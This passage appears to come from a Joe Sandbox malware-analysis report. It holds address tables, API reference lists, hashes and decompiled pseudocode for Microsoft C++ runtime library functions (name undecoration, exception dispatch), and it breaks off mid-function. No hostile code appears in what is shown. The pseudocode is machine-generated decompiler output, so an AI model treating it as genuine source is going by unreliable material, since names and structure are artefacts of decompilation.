                      0x0096787f
                      0x00967886
                      0x0096788e
                      0x00967891
                      0x00967895
                      0x0096789c
                      0x0096789f
                      0x009678a5
                      0x009678a8
                      0x009678ad
                      0x00000000
                      0x00000000
                      0x009678b6
                      0x009678b9
                      0x009678be
                      0x009678c4
                      0x009678c4
                      0x009678c7
                      0x009678cd
                      0x009678d1
                      0x009678d5
                      0x009678dd
                      0x009678e0
                      0x009678e5
                      0x009678e7
                      0x0096794e
                      0x00967951
                      0x009678e9
                      0x009678e9
                      0x009678ec
                      0x009678f1
                      0x009678f3
                      0x0096793e
                      0x00967942
                      0x00967945
                      0x009678f5
                      0x00967904
                      0x00967907
                      0x0096790a
                      0x0096790e
                      0x00967915
                      0x0096791d
                      0x00967920
                      0x00967924
                      0x0096792b
                      0x0096792e
                      0x00967934
                      0x00967937
                      0x00967937
                      0x0096794a
                      0x00967956
                      0x00967959
                      0x0096795e
                      0x00967960
                      0x00000000
                      0x00000000
                      0x00967962
                      0x00967968
                      0x0096796b
                      0x0096796e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0096796e
                      0x00967974
                      0x00967977
                      0x0096797c
                      0x0096797e
                      0x009679c5
                      0x009679c8
                      0x00967980
                      0x00967980
                      0x00967986
                      0x00967995
                      0x0096799a
                      0x009679a1
                      0x009679a4
                      0x009679aa
                      0x009679ad
                      0x009679b2
                      0x009679b8
                      0x009679bb
                      0x009679bb
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009676c4
                      0x00967688
                      0x009675f2
                      0x009675fb
                      0x00000000
                      0x00000000
                      0x00967604
                      0x00000000
                      0x00967609
                      0x00967a36
                      0x00967a3e
                      0x00967a45
                      0x00967a52
                      0x00967a59
                      0x00967a76
                      0x00967a79
                      0x00967a89
                      0x00967a9f
                      0x00967ab9
                      0x00967a5b
                      0x00967a60
                      0x00967a60
                      0x00967a47
                      0x00967a4b
                      0x00967ac7
                      0x00967ac7
                      0x00967a4b
                      0x00967ad3
                      0x00000000

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 009675AC
                      • Mailbox.LIBCMTD ref: 00967604
                      • DName::isEmpty.LIBCMTD ref: 00967614
                      • operator+.LIBVCRUNTIMED ref: 00967641
                      • Mailbox.LIBCMTD ref: 0096764D
                      • operator+.LIBVCRUNTIMED ref: 00967667
                      • Mailbox.LIBCMTD ref: 00967673
                      • DName::operator+.LIBCMTD ref: 00967729
                      • Mailbox.LIBCMTD ref: 00967732
                      • UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 0096775B
                        • Part of subcall function 009644C0: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 009644EB
                        • Part of subcall function 009644C0: Mailbox.LIBCMTD ref: 00964536
                      • operator+.LIBVCRUNTIMED ref: 0096776D
                        • Part of subcall function 0095FAD0: DName::operator+.LIBCMTD ref: 0095FAF1
                      • DName::operator+.LIBCMTD ref: 00967784
                        • Part of subcall function 0095FBB0: Mailbox.LIBCMTD ref: 0095FBC0
                        • Part of subcall function 0095FBB0: DName::operator+=.LIBCMTD ref: 0095FBCD
                        • Part of subcall function 0095FBB0: Mailbox.LIBCMTD ref: 0095FBD9
                      • Mailbox.LIBCMTD ref: 009677A3
                      • DName::operator+.LIBCMTD ref: 009677DE
                      • Mailbox.LIBCMTD ref: 009677E7
                      • DName::operator+.LIBCMTD ref: 00967A23
                      • Mailbox.LIBCMTD ref: 00967A2C
                      • DName::operator+.LIBCMTD ref: 0096779A
                        • Part of subcall function 0095FB70: Mailbox.LIBCMTD ref: 0095FB80
                        • Part of subcall function 0095FB70: Mailbox.LIBCMTD ref: 0095FB98
                      • DName::isEmpty.LIBCMTD ref: 00967A52
                      • DName::operator=.LIBVCRUNTIMED ref: 00967A60
                      • DName::DName.LIBVCRUNTIMED ref: 00967A84
                      • DName::operator+.LIBCMTD ref: 00967A9A
                      • DName::operator+.LIBCMTD ref: 00967AB0
                      • Mailbox.LIBCMTD ref: 00967AB9
                      • DName::operator=.LIBVCRUNTIMED ref: 00967AC7
                      • Mailbox.LIBCMTD ref: 00967AD3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$Name::operator+$Nameoperator+$DecoratedDecorator::getEmptyName::isName::operator=$Iterator_baseIterator_base::_Name::Name::operator+=std::_
                      • String ID: -$@$`anonymous namespace'
                      • API String ID: 625857421-2591561782
                      • Opcode ID: 996d392b48849075600854512d4a717ea421ce7827394c296585d712c558e8ab
                      • Instruction ID: e361c5f9a8181f915f21381449771052257c7cecca4c53a2a1b3c53ebe2e43f7
                      • Opcode Fuzzy Hash: 996d392b48849075600854512d4a717ea421ce7827394c296585d712c558e8ab
                      • Instruction Fuzzy Hash: DEF16271D44118ABDB14EFE0DCA2FEEB779AF94304F10816AE516A7191EB306B48CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00965490 Relevance: 75.6, APIs: 42, Strings: 1, Instructions: 391COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1519 965490-9654a3 1520 9654a5-9654ba call 95fb00 1519->1520 1521 9654bf-9654cb 1519->1521 1528 96596b-96596e 1520->1528 1522 9654cd-9654d8 1521->1522 1523 9654da-9654e6 1521->1523 1522->1523 1525 9654fa-965520 1522->1525 1523->1525 1526 9654e8-9654f5 call 95f350 1523->1526 1530 965582-965586 1525->1530 1531 965522-96552d 1525->1531 1526->1528 1532 96558e 1530->1532 1533 965588-96558c 1530->1533 1535 965566-96557b call 95fb00 1531->1535 1536 96552f-965555 1531->1536 1537 965595-965599 1532->1537 1533->1532 1533->1537 1535->1528 1538 965557-96555b 1536->1538 1539 96555d 1536->1539 1541 9655ad-9655c7 call 95f3f0 call 95f240 1537->1541 1542 96559b-9655a8 call 95f350 1537->1542 1538->1539 1543 965564-965580 1538->1543 1539->1543 1552 965712-965718 1541->1552 1553 9655cd-9655d8 1541->1553 1542->1528 1543->1537 1554 96577d-965784 call 962230 1552->1554 1555 96571a-965721 call 962230 1552->1555 1556 965673-96567c 1553->1556 1557 9655de-96561b call 960060 call 95faa0 call 95f820 1553->1557 1571 9657b6-9657c9 call 9637c0 call 960000 1554->1571 1572 965786-9657b4 call 9637c0 call 95fb70 call 95f820 1554->1572 1573 965765-965778 call 962be0 call 960000 1555->1573 1574 965723-965763 call 962be0 call 95fad0 call 95fb70 call 95f820 1555->1574 1558 965682-96568d 1556->1558 1598 965656-96566c call 95fb00 call 95f820 1557->1598 1599 96561d-965654 call 9675a0 call 95fad0 call 95fb70 call 95f820 1557->1599 1562 9656c0-9656d5 call 95fb00 1558->1562 1563 96568f-96569b 1558->1563 1562->1528 1568 9656ac-9656b9 call 95f350 1563->1568 1569 96569d-9656e1 call 962380 1563->1569 1568->1528 1602 9656e3-9656f8 call 968ea0 call 95f820 1569->1602 1603 9656fa-96570d call 968ea0 call 960000 1569->1603 1600 9657ce-9657d8 call 96a560 1571->1600 1572->1600 1573->1554 1574->1554 1623 965671 1598->1623 1599->1623 1621 96580c-965824 call 95f7a0 1600->1621 1622 9657da-965807 call 95fad0 call 95fbb0 call 95f820 1600->1622 1602->1552 1603->1552 1634 965826-965831 call 95f3f0 1621->1634 1635 965833 1621->1635 1622->1621 1623->1558 1639 96583a-965895 call 967550 call 9625f0 call 95fad0 call 95fbb0 call 95fd40 call 962380 1634->1639 1635->1639 1657 965897-96589d 1639->1657 1658 9658ab-9658b2 call 962350 1639->1658 1657->1658 1659 96589f-9658a6 call 95fd40 1657->1659 1663 9658b4-9658cc call 967390 call 95fd40 1658->1663 1664 9658ce-9658e1 call 967390 call 960000 1658->1664 1659->1658 1671 9658e6-965905 call 965d00 call 95fd40 call 9623b0 1663->1671 1664->1671 1679 965907-96591f call 968ee0 call 95fd40 1671->1679 1680 965921-965934 call 968ee0 call 960000 1671->1680 1687 965939-96593d 1679->1687 1680->1687 1689 96593f-965968 call 95f820 call 95f240 1687->1689 1690 96594d-96595a call 95f350 1687->1690 1689->1528 1690->1528
                      C-Code - Quality: 100%
                      			E00965490(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v64;
				signed int _v68;
				char _v72;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				char _v112;
				char _v120;
				char _v128;
				char _v136;
				char _v144;
				char _v152;
				char _v160;
				char _v168;
				char _v176;
				char _v184;
				char _v192;
				char _v200;
				char _v208;
				char _v216;
				char _v224;
				char _v232;
				char _v240;
				char _v248;
				char _v256;
				char _v264;
				char _v272;
				signed int _t115;
				signed int _t117;
				signed int _t121;
				void* _t122;
				signed int _t124;
				void* _t131;
				signed int _t133;
				signed int _t134;
				signed int _t140;
				intOrPtr _t158;
				intOrPtr _t161;
				signed int _t165;
				void* _t166;
				intOrPtr _t170;
				void* _t172;
				signed int _t174;
				signed int _t180;
				void* _t183;
				void* _t186;
				void* _t190;
				void* _t194;
				intOrPtr _t197;
				signed int _t207;
				signed int _t211;
				void* _t215;
				signed int _t217;
				signed int _t218;
				signed int _t251;
				signed int _t252;
				signed int _t254;
				signed int _t265;
				signed int _t270;
				signed int _t274;
				signed int _t286;
				signed int _t290;
				signed int _t293;
				void* _t298;
				void* _t299;
				void* _t300;
				void* _t301;
				void* _t313;

				_t299 = __esi;
				_t298 = __edi;
				_t215 = __ebx;
				_t115 =  *0xb30640; // 0x0
				_t317 =  *_t115;
				if( *_t115 != 0) {
					_t217 =  *0xb30640; // 0x0
					__eflags =  *_t217 - 0x36;
					if( *_t217 < 0x36) {
						L4:
						_t270 =  *0xb30640; // 0x0
						__eflags =  *_t270 - 0x5f;
						if( *_t270 == 0x5f) {
							L6:
							_t218 =  *0xb30640; // 0x0
							_v32 =  *_t218 - 0x36;
							_t117 =  *0xb30640; // 0x0
							 *0xb30640 = _t117 + 1;
							_v8 = _v32;
							__eflags = _v8 - 0x29;
							if(_v8 != 0x29) {
								__eflags = _v8;
								if(_v8 < 0) {
									L16:
									_v8 = 0xffffffff;
									L17:
									__eflags = _v8 - 0xffffffff;
									if(_v8 != 0xffffffff) {
										E0095F3F0( &_v64);
										_t222 =  &_v16;
										E0095F240( &_v16, _a8);
										_t274 = _v8 & 0x00000002;
										__eflags = _t274;
										if(_t274 == 0) {
											L35:
											_t276 = _v8 & 0x00000004;
											__eflags = _v8 & 0x00000004;
											if((_v8 & 0x00000004) != 0) {
												_t165 = E00962230(_t222);
												__eflags = _t165;
												if(_t165 == 0) {
													_t166 = E00962BE0(_t215,  &_v168, _t276, _t298, _t299,  &_v168);
													_t300 = _t300 + 4;
													_t222 =  &_v16;
													E00960000( &_v16, __eflags, _t166);
												} else {
													_t170 = E0095FAD0( &_v152, 0x20, E00962BE0(_t215, _t222, _t276, _t298, _t299,  &_v144));
													_t300 = _t300 + 0x10;
													_v44 = _t170;
													_t172 = E0095FB70(_v44,  &_v160,  &_v16);
													_t222 =  &_v16;
													E0095F820( &_v16, _t172);
												}
											}
											_t121 = E00962230(_t222);
											__eflags = _t121;
											if(_t121 == 0) {
												_t122 = E009637C0( &_v192);
												_t301 = _t300 + 4;
												E00960000( &_v16, __eflags, _t122);
											} else {
												_t161 = E009637C0( &_v176);
												_t301 = _t300 + 4;
												_v48 = _t161;
												E0095F820( &_v16, E0095FB70(_v48,  &_v184,  &_v16));
											}
											_t124 = E0096A560(_a8);
											__eflags = _t124;
											if(_t124 == 0) {
												_t158 = E0095FAD0( &_v200, 0x28,  &_v16);
												_t301 = _t301 + 0xc;
												_v52 = _t158;
												E0095F820( &_v16, E0095FBB0(_v52,  &_v208, 0x29));
											}
											_v24 = E0095F7A0(8, 0xb3065c, 0);
											__eflags = _v24;
											if(_v24 == 0) {
												_v28 = 0;
											} else {
												_v28 = E0095F3F0(_v24);
											}
											_v20 = _v28;
											E00967550(_t215, _t298, _t299,  &_v80, _v20);
											_v56 = E0095FAD0( &_v224, 0x28, E009625F0(_t215, _t298, _t299,  &_v216));
											_t131 = E0095FBB0(_v56,  &_v232, 0x29);
											_t228 =  &_v16;
											E0095FD40( &_v16, _t131);
											_t133 = E00962380( &_v16);
											__eflags = _t133;
											if(_t133 != 0) {
												__eflags = _v8 & 0x00000002;
												if((_v8 & 0x00000002) != 0) {
													_t228 =  &_v16;
													E0095FD40( &_v16,  &_v64);
												}
											}
											_t134 = E00962350(_t228);
											__eflags = _t134;
											if(_t134 == 0) {
												E00960000( &_v16, __eflags, E00967390( &_v248));
											} else {
												E0095FD40( &_v16, E00967390( &_v240));
											}
											E0095FD40( &_v16, E00965D00( &_v256));
											_t140 = E009623B0( &_v16);
											__eflags = _t140;
											if(_t140 == 0) {
												E00960000( &_v16, __eflags, E00968EE0( &_v272));
											} else {
												E0095FD40( &_v16, E00968EE0( &_v264));
											}
											__eflags = _v20;
											if(_v20 == 0) {
												E0095F350(_a4, 3);
												return _a4;
											} else {
												E0095F820(_v20,  &_v16);
												E0095F240(_a4,  &_v80);
												return _a4;
											}
										}
										_t174 =  *0xb30640; // 0x0
										__eflags =  *_t174 - 0x40;
										if( *_t174 == 0x40) {
											_t251 =  *0xb30640; // 0x0
											_t252 = _t251 + 1;
											__eflags = _t252;
											 *0xb30640 = _t252;
										} else {
											_v72 = E00960060("::", 2);
											_v68 = _t274;
											_t190 = E0095FAA0( &_v88,  &_v72,  &_v16);
											_t313 = _t300 + 0x14;
											E0095F820( &_v16, _t190);
											_t290 =  *0xb30640; // 0x0
											__eflags =  *_t290;
											if(__eflags == 0) {
												_t194 = E0095FB00(__eflags,  &_v120, 1,  &_v16);
												_t300 = _t313 + 0xc;
												E0095F820( &_v16, _t194);
											} else {
												_t197 = E0095FAD0( &_v104, 0x20, E009675A0(_t215, _t298, _t299, __eflags,  &_v96));
												_t300 = _t313 + 0x10;
												_v40 = _t197;
												E0095F820( &_v16, E0095FB70(_v40,  &_v112,  &_v16));
											}
										}
										_t286 =  *0xb30640; // 0x0
										__eflags =  *_t286;
										if(__eflags == 0) {
											E0095FB00(__eflags, _a4, 1,  &_v16);
											return _a4;
										} else {
											_t254 =  *0xb30640; // 0x0
											__eflags =  *_t254 - 0x40;
											if( *_t254 != 0x40) {
												E0095F350(_a4, 2);
												return _a4;
											}
											_t180 =  *0xb30640; // 0x0
											 *0xb30640 = _t180 + 1;
											__eflags = E00962380(_t254);
											if(__eflags == 0) {
												_t183 = E00968EA0(_t215, _t298, _t299,  &_v136);
												_t300 = _t300 + 4;
												_t222 =  &_v64;
												E00960000( &_v64, __eflags, _t183);
											} else {
												_t186 = E00968EA0(_t215, _t298, _t299,  &_v128);
												_t300 = _t300 + 4;
												_t222 =  &_v64;
												E0095F820( &_v64, _t186);
											}
											goto L35;
										}
									}
									E0095F350(_a4, 2);
									return _a4;
								}
								__eflags = _v8 - 3;
								if(_v8 <= 3) {
									goto L17;
								}
								goto L16;
							}
							_t293 =  *0xb30640; // 0x0
							__eflags =  *_t293;
							if(__eflags == 0) {
								E0095FB00(__eflags, _a4, 1, _a8);
								return _a4;
							}
							_t265 =  *0xb30640; // 0x0
							_v36 =  *_t265 - 0x3d;
							_t207 =  *0xb30640; // 0x0
							 *0xb30640 = _t207 + 1;
							_v8 = _v36;
							__eflags = _v8 - 4;
							if(_v8 < 4) {
								L10:
								_v8 = 0xffffffff;
								L11:
								goto L17;
							}
							__eflags = _v8 - 7;
							if(_v8 <= 7) {
								goto L11;
							}
							goto L10;
						}
						E0095F350(_a4, 2);
						return _a4;
					}
					_t211 =  *0xb30640; // 0x0
					__eflags =  *_t211 - 0x39;
					if( *_t211 <= 0x39) {
						goto L6;
					}
					goto L4;
				}
				E0095FB00(_t317, _a4, 1, _a8);
				return _a4;
			}




















































































                      0x00965490
                      0x00965490
                      0x00965490
                      0x00965499
                      0x009654a1
                      0x009654a3
                      0x009654bf
                      0x009654c8
                      0x009654cb
                      0x009654da
                      0x009654da
                      0x009654e3
                      0x009654e6
                      0x009654fa
                      0x009654fa
                      0x00965506
                      0x00965509
                      0x00965511
                      0x00965519
                      0x0096551c
                      0x00965520
                      0x00965582
                      0x00965586
                      0x0096558e
                      0x0096558e
                      0x00965595
                      0x00965595
                      0x00965599
                      0x009655b0
                      0x009655b9
                      0x009655bc
                      0x009655c4
                      0x009655c4
                      0x009655c7
                      0x00965712
                      0x00965715
                      0x00965715
                      0x00965718
                      0x0096571a
                      0x0096571f
                      0x00965721
                      0x0096576c
                      0x00965771
                      0x00965775
                      0x00965778
                      0x00965723
                      0x0096573c
                      0x00965741
                      0x00965744
                      0x00965755
                      0x0096575b
                      0x0096575e
                      0x0096575e
                      0x00965721
                      0x0096577d
                      0x00965782
                      0x00965784
                      0x009657bd
                      0x009657c2
                      0x009657c9
                      0x00965786
                      0x0096578d
                      0x00965792
                      0x00965795
                      0x009657af
                      0x009657af
                      0x009657d1
                      0x009657d6
                      0x009657d8
                      0x009657e7
                      0x009657ec
                      0x009657ef
                      0x00965807
                      0x00965807
                      0x0096581d
                      0x00965820
                      0x00965824
                      0x00965833
                      0x00965826
                      0x0096582e
                      0x0096582e
                      0x0096583d
                      0x00965848
                      0x00965871
                      0x00965880
                      0x00965886
                      0x00965889
                      0x0096588e
                      0x00965893
                      0x00965895
                      0x0096589a
                      0x0096589d
                      0x009658a3
                      0x009658a6
                      0x009658a6
                      0x0096589d
                      0x009658ab
                      0x009658b0
                      0x009658b2
                      0x009658e1
                      0x009658b4
                      0x009658c7
                      0x009658c7
                      0x009658f9
                      0x009658fe
                      0x00965903
                      0x00965905
                      0x00965934
                      0x00965907
                      0x0096591a
                      0x0096591a
                      0x00965939
                      0x0096593d
                      0x00965952
                      0x00000000
                      0x0096593f
                      0x00965946
                      0x00965963
                      0x00000000
                      0x00965968
                      0x0096593d
                      0x009655cd
                      0x009655d5
                      0x009655d8
                      0x00965673
                      0x00965679
                      0x00965679
                      0x0096567c
                      0x009655de
                      0x009655ed
                      0x009655f0
                      0x009655ff
                      0x00965604
                      0x0096560b
                      0x00965610
                      0x00965619
                      0x0096561b
                      0x00965660
                      0x00965665
                      0x0096566c
                      0x0096561d
                      0x00965630
                      0x00965635
                      0x00965638
                      0x0096564f
                      0x0096564f
                      0x00965671
                      0x00965682
                      0x0096568b
                      0x0096568d
                      0x009656ca
                      0x00000000
                      0x0096568f
                      0x0096568f
                      0x00965698
                      0x0096569b
                      0x009656b1
                      0x00000000
                      0x009656b6
                      0x0096569d
                      0x009656a5
                      0x009656df
                      0x009656e1
                      0x00965701
                      0x00965706
                      0x0096570a
                      0x0096570d
                      0x009656e3
                      0x009656e7
                      0x009656ec
                      0x009656f0
                      0x009656f3
                      0x009656f3
                      0x00000000
                      0x009656e1
                      0x0096568d
                      0x009655a0
                      0x00000000
                      0x009655a5
                      0x00965588
                      0x0096558c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0096558c
                      0x00965522
                      0x0096552b
                      0x0096552d
                      0x00965570
                      0x00000000
                      0x00965578
                      0x0096552f
                      0x0096553b
                      0x0096553e
                      0x00965546
                      0x0096554e
                      0x00965551
                      0x00965555
                      0x0096555d
                      0x0096555d
                      0x00965564
                      0x00000000
                      0x00965580
                      0x00965557
                      0x0096555b
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0096555b
                      0x009654ed
                      0x00000000
                      0x009654f2
                      0x009654cd
                      0x009654d5
                      0x009654d8
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009654d8
                      0x009654af
                      0x00000000

                      APIs
                      • operator+.LIBVCRUNTIMED ref: 009654AF
                        • Part of subcall function 0095FB00: DName::DName.LIBVCRUNTIMED ref: 0095FB0D
                        • Part of subcall function 0095FB00: DName::operator+.LIBCMTD ref: 0095FB20
                      • DName::DName.LIBVCRUNTIMED ref: 009654ED
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: NameName::$Name::operator+operator+
                      • String ID: )
                      • API String ID: 308612335-2427484129
                      • Opcode ID: 338ac7123ea464330fefebe50895a956cb32430da7a51fe407a1eeba22ccce01
                      • Instruction ID: 50af378e7f7ae79373976db695ec2abbade606f0195ed710239bab469502752e
                      • Opcode Fuzzy Hash: 338ac7123ea464330fefebe50895a956cb32430da7a51fe407a1eeba22ccce01
                      • Instruction Fuzzy Hash: 3BE173B1D00508EBDB14EFA0DCA2FEE7779AF84315F548169F916A7151EB30AB08CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0095CD60 Relevance: 59.9, APIs: 31, Strings: 3, Instructions: 422COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 95%
                      			E0095CD60(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, signed int _a20, signed int _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v72;
				char _v80;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v104;
				char _v108;
				char _v124;
				char _v136;
				void* __ebp;
				intOrPtr _t170;
				void* _t175;
				void* _t184;
				void* _t189;
				void* _t192;
				void* _t203;
				signed char _t209;
				signed char _t213;
				void* _t214;
				void* _t236;
				void* _t245;
				signed char _t254;
				signed char _t255;
				void* _t265;
				void* _t266;
				void* _t352;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t357;
				void* _t358;

				_t353 = __esi;
				_t352 = __edi;
				_t266 = __ebx;
				_v5 = 0;
				_v12 = 0xffffffff;
				_t267 = _a16;
				_t170 = E0096B4A0(_a8, _a16, _a20);
				_t355 = _t354 + 0xc;
				_v12 = _t170;
				if(_v12 < 0xffffffff) {
					L3:
					L009A0DE0(_t266, _t267, _t352, _t353);
					L4:
					if( *_a4 != 0xe06d7363 ||  *((intOrPtr*)(_a4 + 0x10)) != 3 ||  *((intOrPtr*)(_a4 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_a4 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_a4 + 0x14)) != 0x19930522) {
						L27:
						E0095D6F0( &_v56, _a20, 0);
						if( *_a4 != 0xe06d7363 ||  *((intOrPtr*)(_a4 + 0x10)) != 3 ||  *((intOrPtr*)(_a4 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_a4 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_a4 + 0x14)) != 0x19930522) {
							_t270 =  &_v56;
							if(E0095E140( &_v56) > 0) {
								if((_a24 & 0x000000ff) != 0) {
									L009A0DE0(_t266,  &_v56, _t352, _t353);
								}
								_t270 = _a4;
								E0095D280(_t266, _a4, _t352, _a4, _a8, _a12, _a16, _a20, _v12, _a28, _a32);
							}
							goto L74;
						} else {
							_t270 =  &_v56;
							if(E0095E140( &_v56) <= 0) {
								_t184 = E0095E130(_a20);
								_t357 = _t355 + 4;
								if(_t184 < 0x19930521) {
									L55:
									L009A0DE0(_t266, _t270, _t352, _t353);
									L56:
									if((_a24 & 0x000000ff) != 0) {
										_push(1);
										_t270 = _a4;
										E0095B0E0(_a4);
										_t357 = _t357 + 8;
									}
									if(( *_a20 & 0x1fffffff) < 0x19930521) {
										L69:
										L74:
										_t175 = E0095C670(_t266, _t270, _t352, _t353);
										if( *((intOrPtr*)(_t175 + 0x1c)) != 0) {
											return L009A0DE0(_t266, _t270, _t352, _t353);
										}
										return _t175;
									} else {
										_t270 = _a20;
										_t189 = E0095E100(_a20);
										_t358 = _t357 + 4;
										if(_t189 != 0) {
											L62:
											_t273 = _a20;
											if((E0095E190(_a20, _a20) & 0x000000ff) != 0) {
												 *((intOrPtr*)(E0095C670(_t266, _t273, _t352, _t353) + 0x10)) = _a4;
												 *((intOrPtr*)(E0095C670(_t266, _a4, _t352, _t353) + 0x14)) = _a12;
												E00999BF0(_a4);
											}
											_t192 = E0095E100(_a20);
											_t270 = _a4;
											if((L0095DF20(_t266, _t352, _t353, _a4, _t192) & 0x000000ff) == 0) {
												 *((intOrPtr*)(E0095C670(_t266, _t270, _t352, _t353) + 0x10)) = _a4;
												 *((intOrPtr*)(E0095C670(_t266, _a4, _t352, _t353) + 0x14)) = _a12;
												if(_a32 != 0) {
													E00959970(_a32, _a4);
												} else {
													E00959970(_a8, _a4);
												}
												E0095DD70(_a8, _a16, _a20);
												E0095DC70(_t266, _a20, _t352, _t353, E0095E100(_a20));
												 *((intOrPtr*)(E0095C670(_t266, _a20, _t352, _t353) + 0x10)) = _a4;
												_t203 = E0095C670(_t266, _a20, _t352, _t353);
												_t270 = _a12;
												 *((intOrPtr*)(_t203 + 0x14)) = _a12;
											}
											goto L69;
										}
										_t209 = E0095E190(_t270, _a20);
										_t358 = _t358 + 4;
										if((_t209 & 0x000000ff) == 0 || _a28 != 0) {
											goto L69;
										} else {
											goto L62;
										}
									}
								}
								_t213 = E0095E190( &_v56, _a20);
								_t357 = _t357 + 4;
								_t270 = _t213 & 0x000000ff;
								if((_t213 & 0x000000ff) != 0) {
									L54:
									goto L56;
								}
								_t214 = E0095E100(_a20);
								_t357 = _t357 + 4;
								if(_t214 == 0) {
									goto L55;
								}
								goto L54;
							}
							E009596D0(_t266, _t352, _t353,  &_v88,  &_v56, _v12, _a16, _a20, _a28);
							_t357 = _t355 + 0x18;
							_v40 = _v88;
							_v36 = _v84;
							while(1) {
								_t270 =  &_v40;
								if((E0095D950( &_v40,  &_v80) & 0x000000ff) == 0) {
									break;
								}
								E0095D8C0( &_v40,  &_v108);
								if(_v108 > _v12 || _v12 > _v104) {
									goto L34;
								} else {
									_push(0);
									_push(0);
									E0095D6C0( &_v64,  &_v108);
									_v28 =  &_v64;
									E0095E0B0(_v28,  &_v48);
									E0095E0D0(_v28,  &_v72);
									while((E0095D840( &_v48,  &_v72) & 0x000000ff) != 0) {
										E0095D880( &_v48,  &_v124);
										_v20 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 0xc)) + 4;
										_v16 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 0xc))));
										while(_v16 > 0) {
											_v32 =  *_v20;
											_t236 = E0095E030( &_v124, _v32,  *((intOrPtr*)(_a4 + 0x1c)));
											_t357 = _t357 + 0xc;
											if(_t236 != 0) {
												_push(_a24 & 0x000000ff);
												_push(_v5 & 0x000000ff);
												E0095CC90(_a4, _a8, _a12, _a16, _a20,  &_v124, _v32,  &_v108, _a28, _a32);
												_t357 = _t357 + 0x30;
												goto L49;
											}
											_v16 = _v16 - 1;
											_v20 = _v20 + 4;
										}
										E0095D910( &_v48);
									}
									L49:
									L34:
									E0095D930( &_v40);
									continue;
								}
							}
							goto L56;
						}
					} else {
						_t307 = _a4;
						if( *((intOrPtr*)(_a4 + 0x1c)) != 0) {
							goto L27;
						}
						_t245 = E0095C670(_t266, _t307, _t352, _t353);
						if( *((intOrPtr*)(_t245 + 0x10)) == 0) {
							return _t245;
						}
						_a4 =  *((intOrPtr*)(E0095C670(_t266, _t307, _t352, _t353) + 0x10));
						_a12 =  *(E0095C670(_t266, _t307, _t352, _t353) + 0x14);
						_v5 = 1;
						if(_a4 == 0) {
							L20:
							L009A0DE0(_t266, _t307, _t352, _t353);
							L21:
							if( *((intOrPtr*)(E0095C670(_t266, _t307, _t352, _t353) + 0x1c)) != 0) {
